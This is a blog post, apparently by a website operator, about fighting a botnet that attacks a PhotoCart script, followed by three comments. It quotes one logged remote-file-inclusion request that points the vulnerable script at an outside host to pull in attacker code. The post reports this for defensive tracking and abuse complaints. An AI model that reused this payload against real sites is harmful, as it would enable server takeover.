The PhotoCart attackers regrouped quick after their other compromised server was cleaned up and launched a new wave based on the file they are trying to upload being hosted within Layeredtech.
The file is now being referenced here:
That's in the Layeredtech network somewhere:"/PhotoCart/adminprint.php?path=http://artelj.com/c.ar?"
host artelj.com has address 72.36.219.90This game of cat and mouse is getting old, but if they want to keep playing then I'll keep getting their playgrounds closed one at a time.
host 72.36.219.90 -> server2.soloymi.com.
whois 72.36.219.90
OrgName: Layered Technologies, Inc.
NetRange: 72.36.128.0 - 72.36.255.255
The only upside today is the botnet that hit my server was much smaller than in the past and didn't include any IPs from theplanet.com, so perhaps they shut down those compromised locations. Will keep monitoring to see if theplanet.com IP's are used from this point forward to see if they resolved this or not.
Oh well, more letters to write to abuse@bunch-o-companies, sigh...
UPDATE: Looks like it might be the typical vulnerability hackers from Turkey as I caught them hitting my site looking for /PhotoCart/ using a Google INURL search.
3 comments:
The server seems already down (fortunately). However each of these hosts is also part of a botnet. Yesterday I did some research and the channel where the bots gather contained 383 members if I remember right - not counting me and the bot herder. Because they are mostly servers I assume that this pretty much an accurate count. Unfortunately the clients log in as invisible, so I couldn't get host names. Anyone knows how to circumvent this?
So you're saying there's 383 machines involved in this network?
That means I've only seen about half of it and hopefully a chunk of that will vanish tomorrow from all the AUP notices I sent today.
FYI, the server is still up at the moment, it's just getting some "Bandwidth Limit Exceeded" errors.
I've seen this before on other accounts these guys have used to host their files.
Post a Comment